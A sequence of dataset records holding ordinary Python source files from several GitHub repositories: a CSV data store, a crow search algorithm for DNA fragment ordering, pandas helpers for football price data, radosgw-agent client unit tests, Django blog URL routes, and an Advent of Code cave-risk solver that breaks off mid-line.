align.start()\n","repo_name":"mahtab-nejati/ontology_of_movies","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26244251875","text":"import csv\nimport datetime\n\n\nclass DataStore:\n\n def __init__(self, filename, fieldnames):\n self.filename = filename\n self.data = list()\n self.fieldnames = fieldnames\n try:\n with open(self.filename, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for item in reader:\n self.data.append(item)\n\n except FileNotFoundError:\n with open(self.filename, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.fieldnames)\n writer.writeheader()\n\n\n def save(self, dict):\n self.data.append(dict)\n with open(self.filename, 'a', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.fieldnames)\n writer.writerow(dict)\n\n\n def get(self):\n for item in self.data:\n yield item\n\n\n","repo_name":"vkorovin/hw15","sub_path":"bot/databckend.py","file_name":"databckend.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70744553426","text":"import numpy as np\nimport random\nfrom local_search import *\nfrom oxfl import OXFL\nfrom utils import fitness\n\n\n#range es mas eficiente que range in python2, in python3 range = range()pyton2\n\n###########################################################################################\n############################### read data ##############################################\ninstance = 'x60189_4'\n\n\nmatrix = np.genfromtxt(instance + '/matrix_conservative.csv', delimiter=',')\nfragments = np.array([])\n\n#fh = open(instance + '/frag_x60189_7.dat')\nfh = open(instance + '/frag_'+ instance +'.dat')\nwhile True:\n line = fh.readline().replace('\\n', '')\n fragments = np.append(fragments, line)\n if not line:\n break\nfh.close()\nfragments = fragments[1::2]\nnum_fragments = fragments.shape[0]\n\n#print(matrix.shape)\n#print(fragments.shape)\n\n###########################################################################################\n###########################################################################################\n\nITERATIONS = 2\nN = 32\nAP = 0.02\nFL = 0.75\nP_LS = 0.49\ncrows = np.zeros(shape=(N,num_fragments))\nmemory = np.zeros(shape=(N,num_fragments))\n\ndef show_crows(solutions):\n print(\"SOLUTIONS\")\n for i in range(solutions.shape[0]):\n print(solutions[i])\n print(fitness(matrix, solutions[i]))\n\n\ndef init_population():\n for i in range(N):\n crow = np.arange(num_fragments) #individual = [0, 1, 2, ...] each index is a fragment\n np.random.shuffle(crow) #shuffle the fragment, this a ramdon solution\n crows[i] = crow\n return crows\n\n\"\"\"\ndef fitness(solution):\n #print(\"calculating fitness of: \", solution)\n overlap = 0\n for i in range(num_fragments - 1):\n #print(\"calculating overlap of: \", int(solution[i]), int(solution[i+1]))\n #print(\"overlap: \", matrix[ int(solution[i]), int(solution[i+1]) ] )\n overlap += matrix[int(solution[i]), int(solution[i+1])] #the overload is yet calculated in matrix\n \n #print(\"fitness calculated: \", overlap)\n return overlap\n\"\"\"\n\ndef P2M_F(individual):\n print(\"local search\")\n\n\ncrows = init_population()\nmemory = crows.copy()\n#print(crows)\n\niter=0\nwhile iter < ITERATIONS:\n print(\"ITERATION: \", iter)\n for i in range(N):\n print('CROW ', i)\n random_crow = random.randint(0, N-1) #chose a random crow\n r = random.random()\n if r >= AP:\n #print(\"the crow look up\", i)\n #print(\"perform oxfl operator\")\n crows[i] = OXFL(crows[i], crows[random_crow], FL)\n\n ################# local search ###################\n r_ls = random.random()\n if r_ls >= P_LS:\n print(\"local search...\")\n individual = crows[i].copy()\n individual = np.squeeze(np.asarray(individual))\n crows[i] = PALS(num_fragments, individual, matrix) \n\n else:\n #print(\"the crow move to ramdon position\", i)\n #the crow go to a random position\n #print('the crow go to random position', i, crows[i])\n np.random.shuffle(crows[i])\n #print('the crow went to random position', i, crows[i])\n #print(\"memory[i]: \",i, memory[i])\n #print(\"crows[i]: \",i, crows[i])\n\n if fitness(matrix, crows[i]) > fitness(matrix, memory[i]):\n #print(\"the new position is better, updating memory\")\n memory[i] = crows[i].copy()\n #print(\"memory[i]: \",i, memory[i])\n #print(\"crows[i]: \",i, crows[i])\n \n iter += 1\n\n\n# get the best fitness\nbest_fitness = 0\nfor i in range(N):\n fit = fitness(matrix, memory[i])\n if fit > best_fitness:\n best_fitness = fit\n\nprint(\"best fitness\", best_fitness)\n","repo_name":"arceda/bio-samples","sub_path":"DFS/crow_search.py","file_name":"crow_search.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32401193736","text":"import pandas as pd\n\n\ndef remove_duplicated_data(df):\n \"\"\"\n Short function that takes in a DataFrame, removes duplicates, and spits out new DataFrame\n :param df: pandas DataFrame\n :return: df without the duplicates\n \"\"\"\n df['temp_id'] = df['Date'].astype('str') + df['ID']\n\n return df.drop_duplicates('temp_id').drop(columns='temp_id')\n\n\ndef timeseries_dates(prices_df):\n \"\"\"\n Takes prices_df from Football Index database and returns dictionary of dates, between which are the dates that need\n to be filled in the timeseries\n :param prices_df: DataFrame of Football Index prices\n :return: dates, dict, of dates to be filled between\n \"\"\"\n assert (prices_df.shape[1] == 9), \"Ensure DataFrame being fed is prices_df; column count not equal to 9\"\n grouped = prices_df.groupby('Date').sum().reset_index()\n grouped['date_diff'] = (grouped['Date'] - grouped['Date'].shift()).dt.days\n grouped = grouped.dropna().reset_index(drop=True)\n outliers = grouped[grouped['date_diff'] != 1]\n rows = outliers.index.values\n dates = {}\n for r in rows:\n dates[grouped.iloc[r]['Date']] = grouped.iloc[r - 1]['Date']\n return dates\n\n\ndef returns_dataframe(prices_df):\n \"\"\"\n Quick function that takes in a prices dataframe as argument and returns a transposed returns dataframe\n \"\"\"\n player_prices_matrix = prices_df.pivot_table('Price', 'Date', 'Name').fillna(method='bfill', inplace=True)\n\n player_returns = pd.DataFrame(((player_prices_matrix.iloc[-1] / player_prices_matrix.iloc[0]) - 1) * 100).round(2)\n player_returns.sort_values(0, ascending=False).reset_index(inplace=True)\n player_returns.columns = ['Name', 'Returns_%']\n\n df = prices_df.drop_duplicates('Name')[['Name', 'Country', 'Team', 'Position']]\n\n return df.merge(player_returns, 'left', 'Name')\n","repo_name":"jpstephens93/football_index","sub_path":"utils/etl/data_handle.py","file_name":"data_handle.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3377627115","text":"import boto\nimport py.test\nfrom mock import Mock\nimport httpretty\nimport re\n\nfrom radosgw_agent import client\nfrom radosgw_agent import exceptions as exc\nfrom radosgw_agent.constants import DEFAULT_TIME\n\n# parametrization helpers\n\ndef endpoints():\n return [\n ('http://example.org', 'example.org', 80, False),\n ('https://example.org', 'example.org', 443, True),\n ('https://[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 443, True),\n ('http://[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 80, False),\n ('http://[e39:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]:8080', '[e39:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 8080, False),\n ('http://e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922', '[e40:92be:ab1c:c9c1:3e2e:dbf6:57c6:8922]', 80, False),\n ('https://example.org:8080', 'example.org', 8080, True),\n ('https://example.org:8080/', 'example.org', 8080, True),\n ('http://example.org:81/a/b/c?b#d', 'example.org', 81, False),\n ]\n\n\nREGION_MAP = {\n \"regions\": [\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://vit:8001/\"\n ],\n \"log_data\": \"true\",\n \"log_meta\": \"true\",\n \"name\": \"skinny-1\"\n },\n {\n \"endpoints\": [\n \"http://vit:8002/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"skinny-2\"\n }\n ],\n \"name\": \"skinny\",\n \"default_placement\": \"\",\n \"master_zone\": \"skinny-1\",\n \"api_name\": \"slim\",\n \"placement_targets\": [],\n \"is_master\": \"true\",\n \"endpoints\": [\n \"http://skinny:80/\"\n ]\n },\n \"key\": \"skinny\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://vit:8003/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"swab-2\"\n },\n {\n \"endpoints\": [\n \"http://vit:8004/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"swab-3\"\n },\n {\n \"endpoints\": [\n \"http://vit:8000/\"\n ],\n \"log_data\": \"true\",\n \"log_meta\": \"true\",\n \"name\": \"swab-1\"\n }\n ],\n \"name\": \"swab\",\n \"default_placement\": \"\",\n \"master_zone\": \"swab-1\",\n \"api_name\": \"shady\",\n \"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://vit:8000/\"\n ]\n },\n \"key\": \"swab\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://ro:80/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"ro-1\"\n },\n {\n \"endpoints\": [\n \"http://ro:8080/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"ro-2\"\n },\n ],\n \"name\": \"readonly\",\n \"default_placement\": \"\",\n \"master_zone\": \"ro-1\",\n \"api_name\": \"readonly\",\n \"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://ro:80/\",\n \"http://ro:8080/\"\n ]\n },\n \"key\": \"readonly\"\n },\n {\n \"val\": {\n \"zones\": [\n {\n \"endpoints\": [\n \"http://meta:80/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"true\",\n \"name\": \"meta-1\"\n },\n {\n \"endpoints\": [\n \"http://meta:8080/\"\n ],\n \"log_data\": \"false\",\n \"log_meta\": \"false\",\n \"name\": \"meta-2\"\n },\n ],\n \"name\": \"metaonly\",\n \"default_placement\": \"\",\n \"master_zone\": \"meta-1\",\n \"api_name\": \"metaonly\",\n \"placement_targets\": [],\n \"is_master\": \"false\",\n \"endpoints\": [\n \"http://meta:80/\",\n \"http://meta:8080/\"\n ]\n },\n \"key\": \"metaonly\"\n }\n ],\n \"master_region\": \"skinny\"\n }\n\ndef test_endpoint_default_port():\n endpoint = client.Endpoint('example.org', None, True)\n assert endpoint.port == 443\n endpoint = client.Endpoint('example.org', None, False)\n assert endpoint.port == 80\n\ndef test_endpoint_port_specified():\n endpoint = client.Endpoint('example.org', 80, True)\n assert endpoint.port == 80\n endpoint = client.Endpoint('example.org', 443, True)\n assert endpoint.port == 443\n\n\ndef test_endpoint_equality():\n default_port = client.Endpoint('a.org', None, True)\n secure = client.Endpoint('a.org', 443, True)\n insecure = client.Endpoint('a.org', 80, False)\n assert default_port == secure\n assert secure == insecure\n assert insecure == default_port\n\n\ndef test_endpoint_inequality():\n base = client.Endpoint('a.org', 80, True)\n diff_host = client.Endpoint('b.org', 80, True)\n diff_port = client.Endpoint('a.org', 81, True)\n insecure = client.Endpoint('a.org', 8080, False)\n assert base != diff_host\n assert base != diff_port\n assert base != insecure\n\n\n@py.test.mark.parametrize('url, host, port, secure', endpoints())\ndef test_parse_endpoint(url, host, port, secure):\n endpoint = client.parse_endpoint(url)\n assert endpoint.port == port\n assert endpoint.host == host\n assert endpoint.secure == secure\n\n\n@py.test.mark.parametrize('url, host, port, secure', endpoints())\ndef test_parse_repr(url, host, port, secure):\n endpoint = repr(client.parse_endpoint(url))\n assert str(secure) in endpoint\n assert str(host) in endpoint\n assert str(port) in endpoint\n\n\ndef test_parse_endpoint_bad_input():\n with py.test.raises(exc.InvalidProtocol):\n client.parse_endpoint('ftp://example.com')\n with py.test.raises(exc.InvalidHost):\n client.parse_endpoint('http://:80/')\n\ndef _test_configure_endpoints(dest_url, dest_region, dest_zone,\n expected_src_url, expected_src_region,\n expected_src_zone, specified_src_url=None,\n meta_only=False):\n dest = client.parse_endpoint(dest_url)\n if specified_src_url is not None:\n src = client.parse_endpoint(specified_src_url)\n else:\n src = client.Endpoint(None, None, None)\n region_map = client.RegionMap(REGION_MAP)\n client.configure_endpoints(region_map, dest, src, meta_only)\n assert dest.region.name == dest_region\n assert dest.zone.name == dest_zone\n assert src == client.parse_endpoint(expected_src_url)\n assert src.region.name == expected_src_region\n assert src.zone.name == expected_src_zone\n\ndef test_configure_endpoints_2nd_region_master_zone_meta():\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_master_zone_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_master_region_2nd_zone():\n _test_configure_endpoints('http://vit:8002', 'skinny', 'skinny-2',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef test_configure_endpoints_2nd_region_2nd_zone():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8000', 'swab', 'swab-1')\n\ndef test_configure_endpoints_2nd_region_readonly_meta():\n _test_configure_endpoints('http://ro:8080', 'readonly', 'ro-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_readonly_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://ro:8080', 'readonly', 'ro-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_2nd_region_metaonly_meta():\n _test_configure_endpoints('http://meta:8080', 'metaonly', 'meta-2',\n 'http://meta:80', 'metaonly', 'meta-1',\n meta_only=True)\n\ndef test_configure_endpoints_2nd_region_metaonly_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://meta:8080', 'metaonly', 'meta-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n meta_only=False)\n\ndef test_configure_endpoints_master_region_master_zone():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef test_configure_endpoints_specified_src_same_region():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000')\n\ndef test_configure_endpoints_specified_src_master_region_meta():\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', meta_only=True)\n\ndef test_configure_endpoints_specified_src_master_region_data():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:8001', meta_only=False)\n\ndef test_configure_endpoints_bad_src_same_region():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8004', 'swab', 'swab-3',\n 'http://vit:8004')\n\ndef test_configure_endpoints_bad_src_master_region():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8003', 'swab', 'swab-2',\n 'http://vit:8002', 'skinny', 'skinny-2',\n 'http://vit:8002')\n\ndef test_configure_endpoints_bad_src_same_zone():\n with py.test.raises(exc.InvalidZone):\n _test_configure_endpoints('http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000', 'swab', 'swab-1',\n 'http://vit:8000')\n\ndef test_configure_endpoints_specified_nonexistent_src():\n with py.test.raises(exc.ZoneNotFound):\n _test_configure_endpoints('http://vit:8005', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1',\n 'http://vit:80')\n\ndef test_configure_endpoints_unknown_zone():\n with py.test.raises(exc.ZoneNotFound):\n _test_configure_endpoints('http://vit:8005', 'skinny', 'skinny-1',\n 'http://vit:8001', 'skinny', 'skinny-1')\n\ndef http_invalid_status_codes():\n return [\n 101, 102, 300, 301, 302, 303, 304, 305, 306, 307, 308,\n ]\n\ndef http_valid_status_codes():\n return [\n 200, 201, 202, 203, 204, 205, 207, 208, 226,\n ]\n\nclass TestCheckResultStatus(object):\n\n @py.test.mark.parametrize('code', http_invalid_status_codes())\n def test_check_raises_http_error(self, code):\n response = Mock()\n response.status = code\n with py.test.raises(exc.HttpError):\n client.check_result_status(response)\n\n @py.test.mark.parametrize('code', http_valid_status_codes())\n def test_check_does_not_raise_http_error(self, code):\n response = Mock()\n response.status = code\n assert client.check_result_status(response) is None\n\n\n def test_check_raises_not_found(self):\n response = Mock()\n response.status = 404\n with py.test.raises(exc.NotFound):\n client.check_result_status(response)\n\n\nclass TestBotoCall(object):\n\n def test_return_val(self):\n @client.boto_call\n def foo(*args, **kwargs):\n return (args, kwargs)\n assert foo(1) == ((1,), {})\n assert foo(b=2) == (tuple(), {'b': 2})\n\n def test_boto_exception_not_found(self):\n @client.boto_call\n def foo():\n raise boto.exception.S3ResponseError(404, '')\n\n with py.test.raises(exc.NotFound):\n foo()\n\n def test_non_boto_exception(self):\n @client.boto_call\n def foo():\n raise ValueError('')\n\n with py.test.raises(ValueError):\n foo()\n\n\nclass TestRequest(object):\n\n @httpretty.activate\n def test_url(self):\n\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body='{}',\n content_type=\"application/json\",\n )\n connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n\n client.request(connection, 'get', '/%7E~', _retries=0)\n server_request = httpretty.last_request()\n assert server_request.path == '/%257E%7E'\n\n @httpretty.activate\n def test_url_response(self):\n\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body='{\"msg\": \"ok\"}',\n content_type=\"application/json\",\n )\n connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n\n result = client.request(connection, 'get', '/%7E~', _retries=0)\n assert result == {'msg': 'ok'}\n\n @httpretty.activate\n def test_url_bad(self):\n\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body='{}',\n content_type=\"application/json\",\n status=500,\n )\n connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n\n with py.test.raises(exc.HttpError):\n client.request(connection, 'get', '/%7E~', _retries=0)\n\n\nclass TestBotoCall(object):\n\n def test_return_val(self):\n @client.boto_call\n def foo(*args, **kwargs):\n return (args, kwargs)\n assert foo(1) == ((1,), {})\n assert foo(b=2) == (tuple(), {'b': 2})\n\n def test_boto_exception_not_found(self):\n @client.boto_call\n def foo():\n raise boto.exception.S3ResponseError(404, '')\n\n with py.test.raises(exc.NotFound):\n foo()\n\n def test_non_boto_exception(self):\n @client.boto_call\n def foo():\n raise ValueError('')\n\n with py.test.raises(ValueError):\n foo()\n\n\nclass TestGETClientRequestsPaths(object):\n\n def setup(self):\n self.connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n\n def register(self, body=None):\n body = body or '{}'\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body=body,\n content_type=\"application/json\",\n )\n\n @httpretty.activate\n def test_get_metadata(self):\n self.register()\n client.get_metadata(self.connection, 'bucket.instance', 'foo')\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/bucket.instance?key=foo'\n\n @httpretty.activate\n def test_get_metadata_no_re_encoding(self):\n self.register()\n client.get_metadata(self.connection, 'bucket.instance', 'mybar:r0z0.4140.1')\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/bucket.instance?key=mybar%3Ar0z0.4140.1'\n\n @httpretty.activate\n def test_get_metadata_sections(self):\n self.register()\n client.get_metadata_sections(self.connection)\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata'\n\n @httpretty.activate\n def test_list_metadata_keys(self):\n self.register()\n client.list_metadata_keys(self.connection, 'foo')\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/foo'\n\n @httpretty.activate\n def test_get_bucket_list(self):\n self.register()\n client.get_bucket_list(self.connection)\n server_request = httpretty.last_request()\n assert server_request.path == '/admin/metadata/bucket'\n\n @httpretty.activate\n def test_url_response(self):\n\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body='{\"msg\": \"ok\"}',\n content_type=\"application/json\",\n )\n result = client.request(self.connection, 'get', '/%7E~')\n assert result == {'msg': 'ok'}\n\n\nclass TestClientListObjectsInBucket(object):\n\n def setup(self):\n self.connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n self.body = \"\"\"\n [\n {\n \"name\": \"mahobject/\",\n \"etag\": \"d41d8cd98f00b204e9800998ecf8427e\",\n \"content_type\": \"application/octet-stream\",\n \"last_modified\": \"2015-01-15T15:24:42.000Z\",\n \"storage_class\": \"STANDARD\",\n \"owner\": {\n \"display_name\": \"client1-system-user\",\n \"id\": \"client1-system-user\"\n }\n }\n ]\n \"\"\"\n\n def register(self, body=None):\n body = body or self.body\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body=body,\n content_type=\"application/json\",\n )\n\n @httpretty.activate\n def test_get_bucket_is_a_single_item(self):\n self.register()\n result = client.get_bucket_list(self.connection)\n assert len(result) == 1\n\n @httpretty.activate\n def test_get_bucket_has_right_metadata(self):\n self.register()\n result = client.get_bucket_list(self.connection)\n obj = result[0]\n owner = {\n \"display_name\": \"client1-system-user\",\n \"id\": \"client1-system-user\"\n }\n assert obj['name'] == 'mahobject/'\n assert obj['etag'] == 'd41d8cd98f00b204e9800998ecf8427e'\n assert obj['content_type'] == 'application/octet-stream'\n assert obj['last_modified'] == '2015-01-15T15:24:42.000Z'\n assert obj['storage_class'] == 'STANDARD'\n assert obj['owner'] == owner\n\n\nclass TestClientGetWorkerBound(object):\n\n def setup(self):\n self.connection = client.connection(\n client.Endpoint('localhost', 8888, False, 'key', 'secret'),\n True,\n )\n self.body = \"\"\"\n {\"marker\": \"00000000002.2.3\",\n \"markers\": [\n {\n \"entity\": \"radosgw-agent\",\n \"items_in_progress\": [\n {\n \"name\": \"hello\",\n \"timestamp\": \"0.000000\"\n }\n ],\n \"position_marker\": \"00000000002.2.3\",\n \"position_time\": \"0.000000\"\n }\n ],\n \"oldest_time\": \"0.000000\"\n }\n \"\"\"\n\n def register(self, body=None, status=200):\n body = body or self.body\n httpretty.register_uri(\n httpretty.GET,\n re.compile(\"http://localhost:8888/(.*)\"),\n body=body,\n content_type=\"application/json\",\n status=status\n )\n\n @httpretty.activate\n def test_get_bound_has_right_metadata(self):\n self.register()\n result = client.get_worker_bound(\n self.connection,\n 'bucket-index',\n 'beast:us-east'\n )\n assert result['marker'] == \"00000000002.2.3\"\n assert result['retries'] == set(['hello'])\n assert result['oldest_time'] == \"0.000000\"\n\n @httpretty.activate\n def test_get_bound_fails_fallsback_to_defaults(self):\n self.register(status=404)\n result = client.get_worker_bound(\n self.connection,\n 'bucket-index',\n 'beast:us-east'\n )\n assert result['marker'] == \" \"\n assert result['retries'] == []\n assert result['oldest_time'] == DEFAULT_TIME\n\n\nclass TestIsVersioned(object):\n\n def setup(self):\n # set strict attributes in the mock\n self.obj = Mock(spec=object)\n\n def test_is_in_fact_versioned(self):\n self.obj.VersionedEpoch = u'1'\n self.obj.version_id = 'somehashvalue'\n assert client.is_versioned(self.obj) is True\n\n def test_is_not_versioned_no_attr_versioned_epoch(self):\n assert client.is_versioned(self.obj) is False\n\n def test_is_not_versioned_no_attr_version_id(self):\n assert client.is_versioned(self.obj) is False\n\n def test_is_versioned_version_id(self):\n self.obj.version_id = 1\n assert client.is_versioned(self.obj) is True\n\n def test_is_not_versioned_versioned_id_is_none(self):\n self.obj.version_id = None\n assert client.is_versioned(self.obj) is False\n","repo_name":"ceph/radosgw-agent","sub_path":"radosgw_agent/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":23324,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"15510699809","text":"\"\"\"cnblog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.conf.urls import url\nfrom django.views.static import serve\nfrom blog.views import *\nfrom blog.utils.sdk import *\nfrom .settings import MEDIA_ROOT\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # 登录\n path('login/', login),\n # 获取验证码\n path('verify_code/', verify_code),\n # 主页\n path('index/', index),\n # 注册\n path('register/', register),\n # 注销\n path('logout/', logout),\n # 点赞\n path('like/', like),\n # 评论\n path('comment/', comment),\n # 上传头像\n path('upload/', upload),\n # 判断是否登录\n path('is_login/', is_login),\n # 后台管理\n path('back_stage/', back_stage),\n # 后台管理展现的数据列表(标签和分类)\n path('back_stage_list/', back_stage_list),\n # 增加文章\n path('add_article/', add_article),\n # 增加分类\n path('add_sort/', add_sort),\n # 增加标签\n path('add_tag/', add_tag),\n # 更改密码\n path('change_password/', change_password),\n # 更改头像\n path('change_avatar/', change_avatar),\n\n # 滑动验证码\n url(r'^pc-geetest/register', pcgetcaptcha, name='pcgetcaptcha'),\n url(r'^mobile-geetest/register', pcgetcaptcha, name='mobilegetcaptcha'),\n url(r'^pc-geetest/validate$', pcvalidate, name='pcvalidate'),\n url(r'^pc-geetest/ajax_validate', pcajax_validate, name='pcajax_validate'),\n url(r'^mobile-geetest/ajax_validate', mobileajax_validate, name='mobileajax_validate'),\n\n # media配置\n re_path(r'media/(?P.*)$', serve, {\"document_root\": MEDIA_ROOT}),\n # 个人站点查询\n re_path(r'^(?P\\w+)/$', home_site),\n # 个人站点跳转\n re_path(r'^(?P\\w+)/(?Psort|tag|date)/(?P.*)/$', home_site),\n # 文章/分类/标签 删除\n re_path(r'^delete/(?Psorts|tags|article)/(?P\\w+)/$', delete),\n # 编辑文章\n re_path(r'^edit_article/(?P\\w+)/$', edit_article),\n # 编辑分类\n re_path(r'^edit_sort/(?P\\w+)/$', edit_sort),\n # 编辑标签\n re_path(r'^edit_tag/(?P\\w+)/$', edit_tag),\n # 文章页面\n re_path(r'^(?P\\w+)/article/(?P\\d+)/$', article)\n]\n","repo_name":"ExBurner/BBS-Blog","sub_path":"cnblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15120308245","text":"#!python3\n\n'''\ndepth: 9171\ntarget: 7,721\n\nUse Djikstra's algorithm for part 2\nhttps://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Practical_optimizations_and_infinite_graphs\n\n'''\n\nDEPTH = 9_171\nMODULO = 20_183\nX = 7\nY = 721\n\nTEST_DEPTH = 510\nTEST_X = 10\nTEST_Y = 10\n\n# equipment\nCLIMBING_GEAR = 'climbing_gear'\nTORCH = 'torch'\nNEITHER = 'neither'\n\n\nclass Map(object):\n def __init__(self, depth, target_x, target_y):\n self.depth = depth\n self.target_x = target_x\n self.target_y = target_y\n self.geologic_indexes = {}\n\n\n def get_geologic_index(self, x, y):\n if (x, y) in self.geologic_indexes:\n return self.geologic_indexes[(x, y)]\n if x == 0 and y == 0:\n self.geologic_indexes[(x, y)] = 0\n return 0\n if x == self.target_x and y == self.target_y:\n self.geologic_indexes[(x, y)] = 0\n return 0\n if y == 0:\n g_i = 16807 * x\n self.geologic_indexes[(x, y)] = g_i\n return g_i\n if x == 0:\n g_i = 48271 * y\n self.geologic_indexes[(x, y)] = g_i\n return g_i\n g_i = self.get_erosion_level(x - 1, y) * self.get_erosion_level(x, y - 1)\n self.geologic_indexes[(x, y)] = g_i\n return g_i\n\n\n def get_erosion_level(self, x, y):\n g_i = self.get_geologic_index(x, y)\n return (g_i + self.depth) % MODULO\n\n\n def risk_level(self, x, y):\n return self.get_erosion_level(x, y) % 3\n\n\n def total_risk_level(self, x, y):\n total = 0\n for i in range(x + 1):\n for j in range(y + 1):\n total += self.risk_level(i, j)\n return total\n\n\nclass Node(object):\n def __init__(self, x, y, risk_level, equipment, time):\n self.x = x\n self.y = y\n self.risk_level = risk_level\n self.equipment = equipment\n self.time = time\n\n\nclass UniformCostSearch(object):\n risk_level_equipment = {\n 0: [CLIMBING_GEAR, TORCH],\n 1: [CLIMBING_GEAR, NEITHER],\n 2: [TORCH, NEITHER]\n }\n\n def __init__(self, start, goal, map):\n '''\n start: a node\n goal: a location (x, y)\n nodes: dictionary of Nodes where the keys are tuples - (x, y, equipment).\n '''\n self.start = start\n self.goal = goal\n self.nodes = {}\n self.map = map\n\n\n def _get_neighbours(self, node):\n pass\n\n\n def _get_equipment(self, risk_level):\n return UniformCostSearch.risk_level_equipment[risk_level]\n\n\ndef test1():\n map = Map(TEST_DEPTH, TEST_X, TEST_Y)\n r = map.total_risk_level(TEST_X, TEST_Y)\n assert r == 114\n\n\ndef part1():\n map = Map(DEPTH, X, Y)\n return map.total_risk_level(X, 